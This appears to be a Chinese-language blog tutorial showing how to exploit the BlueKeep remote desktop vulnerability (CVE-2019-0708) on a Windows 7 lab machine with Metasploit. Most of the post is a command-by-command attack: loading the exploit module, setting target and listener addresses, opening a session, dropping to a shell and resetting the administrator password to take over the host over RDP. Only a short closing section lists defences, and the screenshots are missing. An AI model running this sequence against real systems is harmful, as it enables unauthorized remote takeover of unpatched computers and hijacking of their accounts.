白帽子黑客与网络安全工程师带你:远程桌面漏洞利用与Windows7计算机攻防实战

一、课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、战略安排
2.1 打开Metasploit渗透框架,如下如所示。
命令:msfconsole
在这里插入图片描述

2.2 检索有关远程桌面的已知漏洞,如下图所示。
命令:search 0708
在这里插入图片描述

2.3 使用检索到的关于远程桌面的漏洞利用模块,如下图所示。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述

2.4 查看攻击目标需要设置的参数,如下图所示。
命令:show targets
在这里插入图片描述

2.5 设置相关攻击参数,如下图所示。
命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
在这里插入图片描述
在这里插入图片描述

2.6 执行漏洞攻击模块,如下图所示。
命令:run
在这里插入图片描述
在这里插入图片描述

2.7 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:sysinfo
在这里插入图片描述

2.8 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:ipconfig
在这里插入图片描述

2.9 查看会话命令帮助信息,如下图所示。
命令:?
在这里插入图片描述

2.10 进入受害者主机cmd界面并解决乱码问题,如下图所示。
命令:shell
chnp 65001
在这里插入图片描述

2.11 利用“whoami”命令查看相关信息,如下图所示。
命令;whoami
在这里插入图片描述

2.12 利用cmd命令在受害者主机创建一个新用户,如下图所示。
命令:net user administrator 123456
在这里插入图片描述

2.13 利用图形化远程桌面登录工具登录受害者主机,如下图所示。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.14 成功利用图形化远程登录工具拿下目标主机,如下图所示。
在这里插入图片描述

2.15 远程桌面漏洞防护措施,如下图所示(关闭远程桌面登录服务、开启防火墙、安装第三方电脑管家等等)。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux 渗透与白帽编程技巧呢!
点我学习完整视频渗透课,预计更新1000节

posted @ 2022-05-17 19:08  Kali与编程  阅读(14)  评论(0编辑  收藏  举报  来源